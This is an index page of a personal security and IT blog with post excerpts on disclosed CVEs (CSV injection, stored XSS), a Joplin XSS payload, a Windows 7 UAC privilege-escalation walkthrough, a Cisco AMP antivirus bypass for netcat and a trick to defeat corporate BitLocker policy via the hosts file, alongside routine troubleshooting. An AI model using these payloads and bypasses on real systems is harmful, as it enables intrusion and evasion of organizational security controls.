Info Sec & Developers Blog

Dear Reader, I was able to identify CSV Injection in Ericsson ECM (Enterprise Content Management) solution Version: 18.0 (0331) R1E  CVE ID:  CVE-2021-41390 Below are its details: # Software description: Ericsson Catalog Manager allows customers to rapidly launch and enable new innovative offerings with simple user experience and enterprise product, service & resource catalog capabilities.  # Technical Details & Impact: It was observed that Security Provider Endpoint in User Profile Management Section is vulnerable to CSV Injection , using CSV injection; Maliciously crafted formulas can be used for three key attacks: Hijacking the user's computer by exploiting vulnerabilities in the spreadsheet software, such as CVE-2014-3524. Hijacking the user's computer by exploiting the user's tendency to ignore security warnings in spreadsheets that they downloaded from their own website. Exfiltrating contents from the spreadsheet, or other open spreadsheets. # POC Lo...

 Dear Reader, I was able to identify stored XSS in  Ericsson ECM (Enterprise Content Management) solution Version: 18.0 (0331) R1E  CVE ID: CVE-2021-41391 Below are its details: # Software description: Ericsson Catalog Manager allows customers to rapidly launch and enable new innovative offerings with simple user experience and enterprise product, service & resource catalog capabilities.  # Technical Details & Impact: It was observed that Security Management  Endpoint in User Profile Management  Section is vulnerable to stored XSS, In most test cases session hijacking was also possible by utilizing the XSS vulnerability. This potentially allows for full account takeover, or exploiting admin's browsers using beef framework. # POC Login as normal user in ECM  Click on User Profile Management and click on Preference Definition or just visit this URL "https://host:port/ecm/securityManagement " change the host/port to your ECM host/...

 Dear reader, While testing different features of TEAMS, I find out a CSV injection vulnerability in TEAMS Webinar feature, where any external user, or attacker can register himself for attending public webinar and in webinar registration page he can inject a malicious payload which will executed once the admin download the attendees list. As per Microsoft they are not accepting it as high/medium security bug (which I totally Disagree) and not eligible for bounty or hall of fame, also they provided the permission to disclose this publicly.  As per Microsoft the admin has to click enable button once he open the report. For which I mentioned them multiple times that admin will always trust the report as its coming from Trusted source which in this case is Microsoft and 95% of times he will click on Enable button and payload will be executed. Anyways lets start with the Vulnerability details, At the end of this document I will give a bonus trick on how to find publicly available ...

Today while updating my Windows defender to latest version, I was facing below Issue and it was not updating to latest version and showing error code 0x80070643  multiple retried and troubleshoot were performed but nothing helped.  Later I found below commands which help to update defender using command prompt. cd %ProgramFiles%\Windows Defender MpCmdRun.exe -removedefinitions -dynamicsignatures MpCmdRun.exe -SignatureUpdate and it fixed the issue.

Dear Reader Jubair Rehman Yousafzai Here: Update Sept 2022: CVE assigned CVE-2021-33295 https://www.cvedetails.com/cve/CVE-2021-33295/ During the testing of Joplin App Desktop Version before 1.8.5 I was able to execute the malicious XSS when entered in Main body of Joplin App Desktop,  Once I click on Toggle button twice, the payload was executed successfully. The payload which I have used for this testing is as below <noscript><p title="</noscript><img src=x onerror=alert('testing')>">  Below is the POC for this exploit   After reporting to the Joplin team they fixed the issue directly and released the fixed in 1.8.5 version.  Below are their release notes and details:   https://github.com/laurent22/joplin/releases/tag/v1.8.5   Thanks Jubair Rehman: https://twitter.com/jubairfolder

 Dear Reader, From last two days I was extremely annoyed by Windows10 and my Lenovo L490, The issue was my WIFI started disconnecting after every few minutes or sometimes after an hour.  I have tried every method which was suggested over internet below are the methods I have performed. 1. Uninstalling the WIFI driver from device manager and restart the system, the driver got installed automatically after restart but it solve the issue temporarily and the WIFI started disconnecting after an hour. 2. My laptop was connected to 5GHz WIFI, so tried to connected to 2.4GHz, Still the same issue. 3. Downloading new WIFI driver from Lenovo website and installing it, still the same issue. 4. Turning of the option "Allow computer to turn off this device for power saving" details are mentioned below how to turn of.  5. Re-setting the netsh winsock by entering below two commands in CMD (Run As Administrator) but Same issue. -> netsh winsock reset -> netsh int ip reset  6. ...

This post is related to CSV injection in netskope Admin UI (Version 75.0) where an unauthenticated user can inject malicious payload in audit logs of admin portal and once the admin extract and open the report, the malicious payload will be executed. CVE ID : CVE-2020-28845 Test case : The audit logs consist of login attempts which includes username, for test case I have injected a non-malicious payload in username field, this payload was reflecting in audit logs and was executed once we download and open the report. Exploitation :  In below screenshot you can see a sample csv injection payload and a dummy password. To verify if our payload is reflecting in Audit logs of admin portal, we logged-in as an admin and in below screenshot our payload can be seen    Admin of Netskope admin extracted and downloaded the report.  Admin opens the downloaded reported and our payload got executed. This Vulnerability has been fixed now in the latest version of NetSkope and CVE ID ...

Dear Reader, I was able to identify stored XSS in multiple web base modules of Ericsson BSCS iX R18 Billing & Rating platform  Below are its details: # Software description: Ericsson Billing is a convergent billing solution for telecoms that combines an unrivaled combination of out-of-the box features and high configurability. As an evolution of the widely-installed Ericsson BSCS iX, Ericsson Billing provides a low-risk but effective route to capture and secure revenue streams and take advantage of business opportunities from both traditional telecom services as well as digital services, 5G and IoT. # Technical Details & Impact: There are multiple web base modules in BSCS iX e.g. ADMX, MX (monitoring center), CX etc. It was observed that ADMX and MX are vulnerable to stored XSS, In most test cases session hijacking was also possible by utilizing the XSS vulnerability. This potentially allows for full account takeover, or exploiting admin's browsers using beef...

Dear reader, Few days before I was testing Kibana in my organization which is using kibana version 6.6.1, while testing I was able to find a csv injection in dashboard tab, there was No CVE or any other information about this specific vulnerability, So I have reported this issue to Kibana which will be fixed soon as a security hardening feature. Let's start with the POC of this vulnerability.  Below are the steps to reproduce. 1.      Large number of the Kibana portal on internet is open and has no authentication and can be exploited by this injection. 2.      Click on Dashboard tab and select any dashboard from the list. I would suggest to select the dashboard which has gauge visualization type as shown in below screenshot. 3.      Once you are on dashboard click on Edit button on top right .   4.      Click gear(options) button of any graphical view box. 5. ...

Dear reader, Below article is related to creating your personal folder which cannot be accessible to anyone or 98% users, even not to your system administrator or your organizational administrators (AD Admins) will be able to access it (except from 2 tricks which are share at the end of article). So lets start: As you all must be aware that there are certain words/Name which you cannot give to folder in windows. e.g. You can’t make a folder in Windows having CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, and LPT9. as the name. This is because these folder names are reserved for use in specific system related operations/tasks. But there is a trick that you can create folder using these name and if you double click it, it won't open or in cmd you can't CD, DIR to that folder, which mean anything inside that folder can't be viewed (except from one trick which will be shared at the end of thi...

Dear all, This article is related to windows 7 Escalation of Privilege which was identified by Zero Day Initiative (Article link ) Here is the short version of how to escalate the Privilege if your windows 7 is not updated in/after Nov 2019. 1st you have to download an application which is signed by old Microsoft  certificate. Right click on it and go to properties and click on UNLOCK button. Right click on the application and run as administrator. UAC box will appear. Click on Show details, it will show you a Hyper Link, click on it. Certificate popup box will appear, there will be hyper link in front of ISSUED By row. Click it and it will open IE running as system privileges, close the all popup boxes. and open the minimized IE. Click on setting buttons and click on Save AS from there you can go to windows/system32 directory and run a CMD. Exploitation Video is below: https://www.youtube.com/watch?v=3BQKpPNlTSo Also below are the links of Old signed "Micros...

Dear Reader, Today while testing for a website I changed my Firefox proxy setting to burp-suite proxy and completed the testing, now when I revert back the normal proxy settings/system proxy. The websites like google and other HTTPS base websites started showing my HSTS error due to our organization's self signed certificate. If you are facing same error below are the steps to follow: Close all tabs in Firefox. Go to proxy setting in Firefox and set your manual proxy or select proxy system proxy. Note that if you select system proxy, you have to set proxy in internet explorer . Once everything done, Open New Tab and type this and hit enter about:config It will show you an alert and click i accept s It will open a page, on top of that page there will be a search bar, in that search bar copy paste this: security.enterprise_roots.enabled The search bar will show you the value, double click on that value and its value will be changed true.  Close your browser and open it ag...

Dear all, specially penetration testers If you were testing some new windows exploit which can help you in UAC bypass or fileless UAC bypass. Once you run the exploit and after sometimes you note that now all settings like network settings display settings and other windows settings are not opening or its opening CMD instead of normal settings, you are at right place to find the solution. Today I was testing a windows 10 UAC bypass exploit and my system's settings stops working and some settings are opening cmd.exe which annoyed my alot, so after alittle research and reading the exploit code, i got the solution. Below are the solution steps. Good news is that you dont need admin rights to do it. Open the registry (win+R, type regedit and hit enter) Next go to this path in registry \HKEY_CURRENT_USER\Software\Classes\ Inside the classes hive you will see ms-setting folder, right click on ms-setting and rename it to ms-settings- or any other name. close the regis...

Dear reader As you know we update this blog once we get in some kind of trouble in our daily life, So today our organization started Bitlocker implementation on all systems which will encrypt all drives, I have allowed encryption on only C (windows) drive, but soon after that, the bitlocker started giving me popups like encrypt your D,E drive. I have clicked on postponed multiple times but it keeps on appearing after few minutes. Sooooo, if you have faced such issue below is the an awesome trick to bypass it, also you won't find this trick any where else on internet as its completely self learned. So I knew that this Bitlocker is some how communicating to its centralized server for policy updates or may be for some other communication or keys recovery or reports etc, and I knew that server information will be stored in Registry. But the problem was to search for those registry keys and find the server information and edit the host file and assigning the localhost to serv...

Hi to everyone, As you know we update this blog whenever we encounter any issue and solve it after hell of trying. So today we will talk about Vmware and no IP/ no eth0 problem. The Problem which I faced was when I updated my windows 10 Wifi driver because it was causing some issues whenever I wanted to connect to some new WIFI network it always gives me errors like cant connect , so I had to update the Wifi driver. As I updated my driver I came across this problem that All the *nix (Linux/Unix) VMs in my VMWARE workstation 12 stopped working. But my windows VMs were working fine. As simple ifconfig  commands only shows the loopback interface and no eth0 interface. i tried to run ifconfig -a   than it showed the eth0  with no IP address assign to it. If u having the same problem, below solution can help you. 1st u have to login your *nix machine as root or you can do sudo and than perform below steps Step 1: leafpad /etc/network/interfaces  or...

Dear All, Its been a while that we have not updated this forum. Today we will talk about the AV bypassing or to check if your antivirus is really what they are claiming, So i have start testing the CISCO AMP for endpoint, it was detecting the netcat file (nc.exe) as a remote monitoring tool and was keep on deleting it. To bypass the AV i copied the nc.exe to an excluded directory which i already knew. Or in your case you have to perform below actions on a VM or another machine which do not have Cisco AMP installed. So lets start the bypassing process. We will assume that we copy our nc.exe in below directory: C:\excluded\   Open powershell (by press windows+R button and type powershell). Move to excluded directory in powershell cd C:\excluded\ Type following commands in power shell. Replace the test.exe with the your exe name which you want not to detected by Antivirus. Get-FileHash -Path '.\test.exe' -Algorithm SHA256 (1st note the hash) add-Content -...

Dear Visitor, As you all know this blog is updated when we admin get stuck in some error and after some hard work we solve that issue, so we post that problem and solution. Today I was trying to install java 8 on my laptop but when i tried to install it gives me some error. After many many tries i was able to install java8. so lets start ----- Why error occurs: Most of the time java installation error occurs because of old version and some times the java version you are trying to install. So I will show you complete automatic solution just in few clicks you will have latest version of java. ---- Requirement: 1. JavaRa (Download page https://singularlabs.com/software/javara/javara-download/ ) Free ---- Steps: Download JavaRa and unzip it. Run JavaRa.exe as an Administrator As shown in image below this tool have some good options.  1st we will uninstall java and all its left over components. so click on Remove Java Run Time.   Next click on drop down and ...

Hi guys,  Today I came cross to a most disturbing situation when I was try to save a contact in my android contact list from my call logs, everything went well when I tap on DONE (to save the contact) it keeps on loading (SAVING CONTACT). So I restart my cell (my worse discussion). After that when the cell got restart, after every 2-3 min the contacts got hidden also in dallier i wasn't able to search anything and i wasn't able to sync it to google account, On Shutdown and Power-on contact list just showing contact list being updated . But on restart it works for 2-3 min.  Later on I understand that its because of that one corrupt contact/unsaved contact. So here are the step i took and fixed the problem. I directly unplugged the battery from my cell without selecting restart/shutdown option. Plugged in battery again and start the cell. As it started I open the contacts (at that time it was working fine) so I select import/export option and backed up my contacts to...

If you see only two application pools and both of them are set to the .NET Framework 2.0, you have to install ASP.NET 4 in IIS:     Open a command prompt window by right-clicking Command Prompt in the Windows Start menu and selecting Run as Administrator. Then run aspnet_regiis.exe to install ASP.NET 4 in IIS, using the following commands. (In 64-bit systems, replace "Framework" with "Framework64".)     cd %windir%\Microsoft.NET\Framework\v4.0.30319     aspnet_regiis.exe –iru     aspnet_regiis_installing_ASP.NET_4     This command creates new application pools for the .NET Framework 4, but the default application pool will still be set to 2.0. You'll be deploying an application that targets .NET 4 to that application pool, so you have to change the application pool to .NET 4. If you closed IIS Manager, run it again, expand the server node, and click Application Pools to display the Application Pools pane aga...

ExecuteReader: Used for any result which returns multiple rows / columns. Mostly used for select statements. ExecuteScalar: Used for any result which return only single value. if it returns more that 1 row/column, then the result is the first column of the first row. Mostly used in aggregate functions like sum, avg etc. ExecuteNonQuery: Used in queries which does not return any data. Mostly used with Delete, Update, Insert queries.